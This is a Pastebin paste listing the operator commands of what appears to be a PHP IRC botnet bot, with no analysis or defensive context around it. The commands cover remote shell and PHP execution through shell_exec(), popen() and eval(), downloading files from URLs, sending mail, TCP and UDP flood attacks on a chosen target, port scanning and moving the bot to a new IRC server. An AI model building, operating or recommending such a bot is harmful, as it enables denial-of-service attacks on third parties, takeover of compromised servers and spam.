Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #
- = COMMANDS ============================================================================|
- #
- .user <password> //login to the bot
- #
- .logout //logout of the bot
- #
- .die //kill the bot
- #
- .restart //restart the bot
- #
- .mail <to> <from> <subject> <msg> //send an email
- #
- .dns <IP|HOST> //dns lookup
- #
- .download <URL> <filename> //download a file
- #
- .exec <cmd> // uses shell_exec() //execute a command
- #
- .cmd <cmd> // uses popen() //execute a command
- #
- .info //get system information
- #
- .php <php code> // uses eval() //execute php code
- #
- .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
- #
- .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
- #
- .raw <cmd> //raw IRC command
- #
- .rndnick //change nickname
- #
- .pscan <host> <port> //port scan
- #
- .ud.server <newhost> <newport> [newpass] //change IRC server
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement